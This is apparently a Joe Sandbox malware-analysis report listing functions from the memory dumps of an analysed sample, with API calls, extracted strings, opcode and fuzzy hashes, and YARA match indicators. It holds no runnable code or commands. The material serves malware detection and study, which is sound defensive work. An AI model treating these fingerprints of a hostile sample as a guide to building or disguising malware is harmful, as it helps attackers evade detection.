Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Clipboard$CloseDataInfoOpenWindow
String ID: a$b$c$c$l$n
API String ID: 2278096442-2118919457
Opcode ID: 64775b5eaf4b6f3b9d3a5648747dfa61d183d83a94ea54748d631ebe41212b84
Instruction ID: f32526a2b7493747e302e038e132543e99afde457dca7fc2a9710eba875402e9
Opcode Fuzzy Hash: 64775b5eaf4b6f3b9d3a5648747dfa61d183d83a94ea54748d631ebe41212b84
Instruction Fuzzy Hash: 26517EB0908B80CFC720DF38D485A16BBF1AB15314F148A6DE8D68B796D739E446CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0369591D Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 488COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0369595F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 03695995
RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,00000000,?), ref: 03695CBF
RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,?,?), ref: 03695D04

Strings

VSB, xrefs: 03695B25

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: VSB
API String ID: 237503144-2654250299
Opcode ID: 42af359a222c5161f70fb859cd19a903b14d8ab4fd0dfb036164610f8498505b
Instruction ID: 104a6465a0665e1fa9be3bce132cb10bcdeeaa2a5e549ac891e4ed31e3e2f588
Opcode Fuzzy Hash: 42af359a222c5161f70fb859cd19a903b14d8ab4fd0dfb036164610f8498505b
Instruction Fuzzy Hash: 29F19EB5900B01AFD725CF29C842B63BBF9FF4A314F14461DE8AA8B790E371A411CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00426097 Relevance: 7.1, Strings: 5, Instructions: 837COMMON

Download Yara Rule

Strings

7452, xrefs: 0042672B
A^Y[, xrefs: 00426AF3
UUC\, xrefs: 00426AFA
MVVS, xrefs: 00426AE5
kJMO, xrefs: 00426BE0

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 7452$A^Y[$MVVS$UUC\$kJMO
API String ID: 0-3157732848
Opcode ID: b5052e699182a1a0a308292b471bdefcab18d731424f3935f2db044417b9ce16
Instruction ID: 855735e6d1ad8dab1ee178d7f2696252d8d8baabb8e7f5f75f29c0cf4dda7a31
Opcode Fuzzy Hash: b5052e699182a1a0a308292b471bdefcab18d731424f3935f2db044417b9ce16
Instruction Fuzzy Hash: 2B52BE70204B918BD339CF29D094767BBE1BF56304F944A6EC4E78BB91C779A40ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 036A62FE Relevance: 7.1, Strings: 5, Instructions: 837COMMON

Download Yara Rule

Strings

7452, xrefs: 036A6992
A^Y[, xrefs: 036A6D5A
MVVS, xrefs: 036A6D4C
kJMO, xrefs: 036A6E47
UUC\, xrefs: 036A6D61

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$A^Y[$MVVS$UUC\$kJMO
API String ID: 0-3157732848
Opcode ID: 08fb9053458d0069092ab075ac869d68a8945f95c6ad2078fbf6478a2e09a0e2
Instruction ID: a53812aab6101fd534c9218cd674d0317fc5d299d1c13912be8d7faf54d5626f
Opcode Fuzzy Hash: 08fb9053458d0069092ab075ac869d68a8945f95c6ad2078fbf6478a2e09a0e2
Instruction Fuzzy Hash: C8527970604B818BD339CF29C194766FBE2BF56304F588A6DC4E78BB91C775A80ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 03684937 Relevance: 5.5, Strings: 4, Instructions: 506COMMON

Download Yara Rule

Strings

IDAT, xrefs: 03684DEE
), xrefs: 036849C5
IEND, xrefs: 03684E66
IHDR, xrefs: 03684D7D

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )$IDAT$IEND$IHDR
API String ID: 0-3181356877
Opcode ID: 3511b082d5560558510c94d3efdee04cf19d2c1898fd965802b973fdfc2f06ca
Instruction ID: d3da27535e07c57e382cdac106d3cb260e663b2f277db8a921b92042240b60d9
Opcode Fuzzy Hash: 3511b082d5560558510c94d3efdee04cf19d2c1898fd965802b973fdfc2f06ca
Instruction Fuzzy Hash: D2126571A043859FDB14DF29DC9076ABBE0EF88300F08866DF9859B381D779D909CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0369CEC7 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

7q9w, xrefs: 0369CEE5
m!s, xrefs: 0369CF2D
tu, xrefs: 0369CEED

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: m!s$7q9w$tu
API String ID: 0-1328737773
Opcode ID: 630394122b1b40b6e144354b10afeacad49fa940cd3a6ea08509c0a48de16aad
Instruction ID: 0556dcf13c682d9f805068ccf047109c0c1453f55c6ffc16138a423b0a689d9e
Opcode Fuzzy Hash: 630394122b1b40b6e144354b10afeacad49fa940cd3a6ea08509c0a48de16aad
Instruction Fuzzy Hash: 9B91F1B56043018BEF14DF14C891B7BB7B9EF81314F194A2DE8818B380E375D912CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0368092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 03680966
GetProcAddress., xrefs: 036809DC, 036809DF, 036809E4
., xrefs: 0368095F

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2967963ad2e7fe8fe25674c90f2a4cebaf849fbd7eb5b7186c51ca1ad417364a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: F4318DB6900609DFDB10DF99C980AADFBF9FF08324F15554AD841A7310D771EA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 036855DB Relevance: 3.3, Strings: 2, Instructions: 800COMMON

Download Yara Rule

Strings

0, xrefs: 03685EEA
8, xrefs: 03685EE2

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: c28052362693d2ec878eb2e9e4053acdb697fe5a00c1b3c7cf0b2954dfd04b5c
Instruction ID: 26bf756cfe5671030b431807e50e115a336e6d640d8d8cb8c756172755d0a3bd
Opcode Fuzzy Hash: c28052362693d2ec878eb2e9e4053acdb697fe5a00c1b3c7cf0b2954dfd04b5c
Instruction Fuzzy Hash: 5D729A716083409FD724DF18C554BAFBBE1AF89314F088A5DFA8A8B3A1C371D955CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00405567 Relevance: 3.0, Strings: 2, Instructions: 510COMMON

Download Yara Rule

Strings

8, xrefs: 00405C7B
0, xrefs: 00405C83

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: f72422da4545a53147ba4bcae673fa22cfdc217a8e972246317f84f25e8baf34
Instruction ID: f7f0119f1880cbbeb85be2149024bdb2ea19f96f545e0beea172c8d0a898f24a
Opcode Fuzzy Hash: f72422da4545a53147ba4bcae673fa22cfdc217a8e972246317f84f25e8baf34
Instruction Fuzzy Hash: 02222271208740AFDB148F18C840B6BBBE2EF88314F18892EF8899B391D375D954CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0043B9D0 Relevance: 2.9, Strings: 2, Instructions: 360COMMON

Download Yara Rule

Strings

R-,T, xrefs: 0043BB70
R-,T, xrefs: 0043BA70

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: R-,T$R-,T
API String ID: 0-2000385741
Opcode ID: 78776dcf700113e912cf05fb3187767aa685e99ccd92a1d0d06634a642cbf857
Instruction ID: 8a29a55053717aff0ea9d03566f8ae78156dab941fa58883738f942dff897c1f
Opcode Fuzzy Hash: 78776dcf700113e912cf05fb3187767aa685e99ccd92a1d0d06634a642cbf857
Instruction Fuzzy Hash: B9C10172A043128BC725CF18C490B6BB7A1FF89314F19966DE9A69B351C738ED04CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 036BBC37 Relevance: 2.9, Strings: 2, Instructions: 360COMMON

Download Yara Rule

Strings

R-,T, xrefs: 036BBCD7
R-,T, xrefs: 036BBDD7

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: R-,T$R-,T
API String ID: 0-2000385741
Opcode ID: cd1c842c8cb882f8655696e56ea315231ebb5dd9269e9338f9166ab2116c86d1
Instruction ID: 5d59fe0e84ad96df2b9f4dd81aba2bd8ce3cbb1e14f95d7c41043d67d9a9543a
Opcode Fuzzy Hash: cd1c842c8cb882f8655696e56ea315231ebb5dd9269e9338f9166ab2116c86d1
Instruction Fuzzy Hash: 7FC11372A043528BC328CF18C490AAAF7F1FF89354F19866CE8A59B351C770D985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0040581F Relevance: 2.8, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

8, xrefs: 00405C7B
0, xrefs: 00405C83

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 570d64d0102431681fc9c2953f0e3e491529824ae676a0b8b950b5723fab437e
Instruction ID: bdea24ff9dfb5e0cd0db60fba46b67bbb96c489911e557cb46ccc3a4af15eb87
Opcode Fuzzy Hash: 570d64d0102431681fc9c2953f0e3e491529824ae676a0b8b950b5723fab437e
Instruction Fuzzy Hash: D0B12631209380AFCB21CF58C880B5FBBE1AF99314F08885EF98597392D675D854DBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00405B18 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

8, xrefs: 00405C7B
0, xrefs: 00405C83

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 74347a645ffaf85fd77ae73b23a4eccb862ef996c88cbf721dd42e1b28c782df
Instruction ID: 37c8e6d2c4d31b8ff407cb87492de83e2db98608a9e4700acb08c765a7b3870e
Opcode Fuzzy Hash: 74347a645ffaf85fd77ae73b23a4eccb862ef996c88cbf721dd42e1b28c782df
Instruction Fuzzy Hash: 64A135316083809FD725CF68D880B6FBBE1EF99350F04882EFA8997391D675D914CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0369B247 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

!, xrefs: 0369B27A
|)t+, xrefs: 0369B266

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !$|)t+
API String ID: 0-1543151180
Opcode ID: a01c931c2f573e3a0e1da8e8599f919eb061fd7c53aebc2c304cd03effb064b8
Instruction ID: b5f445bfd64d5bda6f3966e6620ab39889490536aaa0cf2a64f8ec555802feac
Opcode Fuzzy Hash: a01c931c2f573e3a0e1da8e8599f919eb061fd7c53aebc2c304cd03effb064b8
Instruction Fuzzy Hash: 5B419D715083109BDB18CF18D8A076BB7B5FF8A328F089A1DE8919B380E774D505CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004365C0 Relevance: 2.0, Strings: 1, Instructions: 700COMMON

Download Yara Rule

Strings

f543, xrefs: 00436BD8

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: f543
API String ID: 0-424919641
Opcode ID: 1839045e7a1d4ef8885fcee9d407feabab57971d295a215b95a100435fd6cc41
Instruction ID: a27fba163ec8ca6502e179a43430a23e18181e16a5da658c1e63ab54147eeb45
Opcode Fuzzy Hash: 1839045e7a1d4ef8885fcee9d407feabab57971d295a215b95a100435fd6cc41
Instruction Fuzzy Hash: 04327B742083419FD714CF24C494B2BBBE2BBC9318F65DA1EE8958B391C778D805CB96

Uniqueness

Uniqueness Score: -1.00%

Function 036B6827 Relevance: 2.0, Strings: 1, Instructions: 700COMMON

Download Yara Rule

Strings

f543, xrefs: 036B6E3F

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: f543
API String ID: 0-424919641
Opcode ID: ee1e641224ab94123951b88dafefde2f31790dbb0f3442288f09851e838e1533
Instruction ID: 68b6f199b0ea8083fa9d601950c12b764efd0dc156e6edd5ad0d197ad15a715b
Opcode Fuzzy Hash: ee1e641224ab94123951b88dafefde2f31790dbb0f3442288f09851e838e1533
Instruction Fuzzy Hash: 543258B56083419BD724CF24C490BAAFBF2AFC9318F188A2DE8958B395C775D845CF52

Uniqueness

Uniqueness Score: -1.00%

Function 004261D5 Relevance: 1.7, Strings: 1, Instructions: 432COMMON

Download Yara Rule

Strings

7452, xrefs: 0042672B

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
Instruction ID: 9183c8cb2bdce41f8d6db81880cd269f3f93fb1448a1f7e838d0594f66b23865
Opcode Fuzzy Hash: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
Instruction Fuzzy Hash: C7E16A70604B908BD33ACF39D0943A7BBE1BF56304F954A6EC4E74B791C739A4068B48

Uniqueness

Uniqueness Score: -1.00%

Function 036A643C Relevance: 1.7, Strings: 1, Instructions: 432COMMON

Download Yara Rule

Strings

7452, xrefs: 036A6992

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
Instruction ID: d7b1bb20c8ab20600c7a9fdd949d0cabbbf659e0aeff239ca0f9a2fa56acecd1
Opcode Fuzzy Hash: 54138c22c7979f72702bb9a08b355e5a839a7628d7f0a1cc823a813397b31fdc
Instruction Fuzzy Hash: 52E159B0504F818BD33ACF39C1A47A6BBE1BB56304F584A6EC4E74B791C775A50ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 00426148 Relevance: 1.7, Strings: 1, Instructions: 429COMMON

Download Yara Rule

Strings

7452, xrefs: 0042672B

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
Instruction ID: 0f5e2fea7ca9d0fcb5471046c57c7772b20413f2ee2d671d3732f2d6399003e3
Opcode Fuzzy Hash: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
Instruction Fuzzy Hash: E8E16970604B918BD329CF39D0A43A7BBE1BB56304F954A6EC4E74B691C779A409CB48

Uniqueness

Uniqueness Score: -1.00%

Function 036A63AF Relevance: 1.7, Strings: 1, Instructions: 429COMMON

Download Yara Rule

Strings

7452, xrefs: 036A6992

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
Instruction ID: 59baa23cdca19b0c5f531ff449892ae3c667e623826f9542390451a2a390adf7
Opcode Fuzzy Hash: 1dea606280cec810fd0385baed8d9e9f5f119faaff7c1b778a8d69061cf5cfe0
Instruction Fuzzy Hash: E7E168B0504F818BD33ACF39C1A47A6BBE1BF16304F584A6EC4E74B691C779A50ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 004261C3 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

7452, xrefs: 0042672B

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
Instruction ID: d473763cb8fcafe3d71cd73cd2a945522f078f264cb0929a2263decf9abb313e
Opcode Fuzzy Hash: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
Instruction Fuzzy Hash: 3ED19D70604B908BD326CF34D0A47A7BBE2BF56304F950A5EC8E70B791C779A40ACB49

Uniqueness

Uniqueness Score: -1.00%

Function 036A642A Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

7452, xrefs: 036A6992

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
Instruction ID: c57e20bdb18cb176e3b6e3ce0b246f0e6a5f02aa0d310a225d1d1027cf786e69
Opcode Fuzzy Hash: cf40754c4f5f5cd56b43022b0ab29e4608a7f574ccc41ec9ab392bf31e4060d2
Instruction Fuzzy Hash: 50D17974504F818BD326CF38C1A47A7BBE2AF56308F584A5DC5E70B791C779A80ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00417A65 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

:B, xrefs: 00417AA1

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: :B
API String ID: 0-3257028938
Opcode ID: 3e821f729e7bd7966f8aa8fdbbe72b6607c3b13e90e0310993c0f98e2796235a
Instruction ID: 2c342faefb3c2e803dbce2d9fb269bbbc951d39f873bbb010e15bb50d674dad7
Opcode Fuzzy Hash: 3e821f729e7bd7966f8aa8fdbbe72b6607c3b13e90e0310993c0f98e2796235a
Instruction Fuzzy Hash: 5CB18A742047018BD725CF19C8A1763B7F2FF86324F18855DD8968BB96E778E882CB94

Uniqueness

Uniqueness Score: -1.00%

Function 03697CCC Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

:B, xrefs: 03697D08

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: :B
API String ID: 0-3257028938
Opcode ID: 1e0049a4c92e93eedd58dfb0be8b66b9b761d6fa7d8c5b3983c2548ff99060e7
Instruction ID: 0a1d5db34f9630626b4ae54771e0f810094891fb3df6f6c752cef9d1cbda7f93
Opcode Fuzzy Hash: 1e0049a4c92e93eedd58dfb0be8b66b9b761d6fa7d8c5b3983c2548ff99060e7
Instruction Fuzzy Hash: F3B19C741007018BEB24CF19C891B63B7B5FF86324F19865DD8968FB95E774E842CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004065F0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

,, xrefs: 00406743

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: ba0ccf94401fd5fba908be8ff873a84c86c8c083a6df85b5acfb8f2518fe5101
Instruction ID: 0d8966ef7d050a0ec093872ade78419a3f07b231ada14620d39ddb812e519fe1
Opcode Fuzzy Hash: ba0ccf94401fd5fba908be8ff873a84c86c8c083a6df85b5acfb8f2518fe5101
Instruction Fuzzy Hash: FBB13A71109381AFD314CF68C94465BFBE0AFA9304F444A6EF4D997382D375EA28CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004245D4 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

"64., xrefs: 004247D2

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "64.
API String ID: 0-1818615731
Opcode ID: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
Instruction ID: 9cbbebd9cf2853766a7fd533854aba19562981c866732ef8e5855bd5c730c658
Opcode Fuzzy Hash: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
Instruction Fuzzy Hash: FC614970504F918BD7268F34D8647A3BBE0AB5330AF54199ED1EB8B692D339A446CF14

Uniqueness

Uniqueness Score: -1.00%

Function 036A483B Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

"64., xrefs: 036A4A39

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "64.
API String ID: 0-1818615731
Opcode ID: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
Instruction ID: 30b650a2b313872c5cef4d53c380218b83b9a71f15f5e715731c803a4169852f
Opcode Fuzzy Hash: 8fe9d5c3beee695abd02aa9325a0a233faa359eb8810dd28c624e8655a67746b
Instruction Fuzzy Hash: FC613C70508F818BD726CF39C8647A3BBE0AF1220AF18199DD1EB8B792D775A446CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00424678 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

"64., xrefs: 004247D2

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "64.
API String ID: 0-1818615731
Opcode ID: 1cb5013b924579170817424542a0ed3b001999cde159c9abc9b16e7be69e42ce
Instruction ID: eece925dbea67c09ba23cb815eb0a2b10cd4d1e78693a0ddb335afaecfcb9b96
Opcode Fuzzy Hash: 1cb5013b924579170817424542a0ed3b001999cde159c9abc9b16e7be69e42ce
Instruction Fuzzy Hash: C1515770504F918BD7268F34D8687A3BBE0AB5330AF58195ED1EB8B792D339A4468F14

Uniqueness

Uniqueness Score: -1.00%

Function 036A48DF Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

"64., xrefs: 036A4A39

Memory Dump Source

Source File: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3680000_file.jbxd

Yara matches

Similarity

API ID:
String ID: "64.
API String ID: 0-1818615731
Opcode ID: 1cb5013b924579170817424542a0ed3b001999cde159c9abc9b16e7be69e42ce
Instruction ID: 55663f35c72851bc0adaa772fb90d218932db6655bc470cbb4c5bae2d4d9d8a6
Opcode Fuzzy Hash: 1cb5013b924579170817424542a0ed3b001999cde159c9abc9b16e7be69e42ce
Instruction Fuzzy Hash: 19514C70508F818BD726CF39C8647A3BBE0AF1220AF18199DD1EB8B792D775A446CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004245A8 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

"64., xrefs: 004247D2

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: "64.
API String ID: 0-1818615731
Opcode ID: a40c39fd608072d796451441512b5e74c9891fef408fb92697e9befa5d5d5aec
Instruction ID: 4ba8f46cec079ecce6411922fc76b971d3f4b9dae6926d614598c56714c2f091
Opcode Fuzzy Hash: a40c39fd608072d796451441512b5e74c9891fef408fb92697e9befa5d5d5aec
Instruction Fuzzy Hash: 81418870504F918BD7268F34D8647A3BBE0AB5330AF58095ED1EB8B792D339A046CF14

Uniqueness

Uniqueness Score: -1.00%

